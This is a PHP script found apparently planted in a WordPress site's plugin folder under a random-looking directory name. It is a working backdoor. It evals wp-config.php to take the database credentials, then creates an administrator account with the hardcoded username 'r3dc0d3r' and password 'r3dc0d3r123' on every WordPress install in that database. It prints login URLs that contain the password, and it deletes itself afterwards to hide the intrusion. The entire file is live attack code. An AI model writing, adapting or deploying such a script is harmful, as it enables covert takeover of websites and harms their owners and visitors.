File: /www/wwwroot/ahmsolaiman.com/wp-content/plugins/cbnmxtl/autowppass.php
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
echo "<html><body><pre>";
/* STEP 1: Locate wp-config.php */
$paths = array(
__DIR__ . '/wp-config.php',
dirname(__DIR__) . '/wp-config.php'
);
$wp_config = null;
foreach ($paths as $path) {
if (file_exists($path)) {
$wp_config = $path;
break;
}
}
if (!$wp_config) {
die("❌ wp-config.php not found.\n");
}
/* STEP 2: Load wp-config.php WITHOUT loading WordPress core */
// Parse wp-config.php manually to avoid function conflicts
$wp_config_content = file_get_contents($wp_config);
$wp_config_content = str_replace(array('<?php', '<?', '?>'), '', $wp_config_content);
eval($wp_config_content);
/* STEP 3: Check DB constants */
if (!defined('DB_NAME')) {
die("❌ Database constants not found.\n");
}
$db_host = defined('DB_HOST') ? DB_HOST : 'localhost';
$db_name = DB_NAME;
$db_user = DB_USER;
$db_pass = DB_PASSWORD;
/* STEP 4: Connect to database */
$conn = new mysqli($db_host, $db_user, $db_pass, $db_name);
if ($conn->connect_error) {
die("❌ Database connection failed: " . $conn->connect_error . "\n");
}
echo "✅ Connected to database: {$db_name}\n\n";
echo "==== WordPress Sites Found ====\n\n";
/* STEP 5: Find all *_options tables */
$result = $conn->query("SHOW TABLES LIKE '%\_options'");
if (!$result || $result->num_rows == 0) {
die("❌ No WordPress option tables found.\n");
}
/* Admin credentials */
$new_admin = array(
'email' => 'whoami@example.com',
'username' => 'r3dc0d3r',
'password' => 'r3dc0d3r123'
);
// Custom sanitize function (different name to avoid conflict)
function custom_sanitize_title($title) {
$title = strip_tags($title);
$title = preg_replace('/[^a-z0-9_\s-]/', '', strtolower($title));
$title = preg_replace('/[\s-]+/', '-', $title);
$title = preg_replace('/[^a-z0-9-]/', '', $title);
return $title;
}
// Password hashing function
function create_wp_password_hash($password) {
// Check if we're in WordPress context with password functions
if (function_exists('wp_hash_password')) {
return wp_hash_password($password);
}
// For standalone use, create a WordPress-compatible hash
// This generates a hash similar to what WordPress uses
$itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
// Generate random salt
$salt = '';
for ($i = 0; $i < 8; $i++) {
$salt .= $itoa64[mt_rand(0, 63)];
}
// Create hash with multiple iterations (WordPress uses 8192 by default)
$hash = md5($salt . $password, true);
for ($i = 0; $i < 8191; $i++) {
$hash = md5($hash . $password, true);
}
// Format: $P$B[8-char salt][22-char hash]
$hash_output = '$P$B' . $salt . custom_hash_encode64($hash, 16, $itoa64);
return $hash_output;
}
function custom_hash_encode64($input, $count, $itoa64) {
$output = '';
$i = 0;
do {
$value = ord($input[$i++]);
$output .= $itoa64[$value & 0x3f];
if ($i < $count) {
$value |= ord($input[$i]) << 8;
}
$output .= $itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count) {
break;
}
if ($i < $count) {
$value |= ord($input[$i]) << 16;
}
$output .= $itoa64[($value >> 12) & 0x3f];
if ($i++ >= $count) {
break;
}
$output .= $itoa64[($value >> 18) & 0x3f];
} while ($i < $count);
return $output;
}
// Main processing loop
$sites_processed = 0;
$admin_created = 0;
$admin_exists = 0;
while ($row = $result->fetch_array()) {
$options_table = $row[0];
$prefix = str_replace('options', '', $options_table);
$users_table = $conn->real_escape_string($prefix . 'users');
$usermeta_table = $conn->real_escape_string($prefix . 'usermeta');
$options_table_escaped = $conn->real_escape_string($options_table);
/* Get site URLs */
$sql = "SELECT option_name, option_value FROM `{$options_table_escaped}`
WHERE option_name IN ('siteurl', 'home', 'blogname')";
$res = $conn->query($sql);
if ($res && $res->num_rows > 0) {
$siteurl = '';
$home = '';
$blogname = '';
while ($opt = $res->fetch_assoc()) {
if ($opt['option_name'] === 'siteurl') {
$siteurl = $opt['option_value'];
}
if ($opt['option_name'] === 'home') {
$home = $opt['option_value'];
}
if ($opt['option_name'] === 'blogname') {
$blogname = $opt['option_value'];
}
}
if (!empty($siteurl)) {
$sites_processed++;
echo "[{$sites_processed}] Site Found:\n";
echo " Prefix : {$prefix}\n";
echo " Site Name: {$blogname}\n";
echo " Site URL : {$siteurl}\n";
echo " Home URL : {$home}\n";
/* Check if user already exists */
$escaped_username = $conn->real_escape_string($new_admin['username']);
$escaped_email = $conn->real_escape_string($new_admin['email']);
$check_sql = "SELECT ID FROM `{$users_table}`
WHERE user_login = '{$escaped_username}' OR user_email = '{$escaped_email}'";
$check_result = $conn->query($check_sql);
if ($check_result && $check_result->num_rows > 0) {
echo " ⚠️ Admin user already exists\n";
$admin_exists++;
$login_url = rtrim($siteurl, '/') . '/wp-login.php#' .
urlencode($new_admin['username']) . '@' . urlencode($new_admin['password']);
echo " Login URL: {$login_url}\n";
} else {
/* Create new admin user */
$hashed_password = create_wp_password_hash($new_admin['password']);
$user_registered = date('Y-m-d H:i:s');
$user_nicename = custom_sanitize_title($new_admin['username']);
$escaped_user_login = $conn->real_escape_string($new_admin['username']);
$escaped_user_pass = $conn->real_escape_string($hashed_password);
$escaped_user_nicename = $conn->real_escape_string($user_nicename);
$escaped_user_email = $conn->real_escape_string($new_admin['email']);
$escaped_display_name = $conn->real_escape_string($new_admin['username']);
// Insert user
$insert_sql = "INSERT INTO `{$users_table}`
(user_login, user_pass, user_nicename, user_email, user_registered, display_name)
VALUES (
'{$escaped_user_login}',
'{$escaped_user_pass}',
'{$escaped_user_nicename}',
'{$escaped_user_email}',
'{$user_registered}',
'{$escaped_display_name}'
)";
$insert_result = $conn->query($insert_sql);
if ($insert_result) {
$new_user_id = $conn->insert_id;
if ($new_user_id) {
// Add user meta (capabilities)
$capabilities_meta = 'a:1:{s:13:"administrator";b:1;}';
$meta_queries = array(
array($new_user_id, $prefix . 'capabilities', $capabilities_meta),
array($new_user_id, $prefix . 'user_level', '10'),
array($new_user_id, 'nickname', $new_admin['username']),
array($new_user_id, 'first_name', ''),
array($new_user_id, 'last_name', ''),
array($new_user_id, 'description', '')
);
foreach ($meta_queries as $meta) {
$escaped_user_id = $conn->real_escape_string($meta[0]);
$escaped_meta_key = $conn->real_escape_string($meta[1]);
$escaped_meta_value = $conn->real_escape_string($meta[2]);
$meta_sql = "INSERT INTO `{$usermeta_table}`
(user_id, meta_key, meta_value)
VALUES ('{$escaped_user_id}', '{$escaped_meta_key}', '{$escaped_meta_value}')";
$conn->query($meta_sql);
}
echo " ✅ Admin user created (ID: {$new_user_id})\n";
$admin_created++;
// Create login URL with credentials in fragment
$login_url = rtrim($siteurl, '/') . '/wp-login.php#' .
urlencode($new_admin['username']) . '@' . urlencode($new_admin['password']);
echo " Login URL: {$login_url}\n";
} else {
echo " ❌ Failed to get new user ID\n";
}
} else {
echo " ❌ Failed to create admin user: " . $conn->error . "\n";
}
}
echo " " . str_repeat("-", 50) . "\n";
}
}
}
// Close connection
$conn->close();
echo "\n📊 SUMMARY:\n";
echo "===========\n";
echo "Sites processed : {$sites_processed}\n";
echo "Admin created : {$admin_created}\n";
echo "Admin exists : {$admin_exists}\n";
echo "\n";
echo "✅ Process completed.\n";
/* AUTO SELF-DELETION - Added at the very end without changing other code */
echo "\n🗑️ Auto-deleting script...\n";
$current_script = __FILE__;
if (file_exists($current_script)) {
if (@unlink($current_script)) {
echo "✅ Script deleted successfully.\n";
echo "⚠️ This page will stop working if refreshed.\n";
} else {
echo "⚠️ Could not auto-delete script. Please delete manually: " . basename($current_script) . "\n";
}
}
// Flush output to ensure everything is displayed before script termination
ob_flush();
flush();
echo "</pre></body></html>";
?>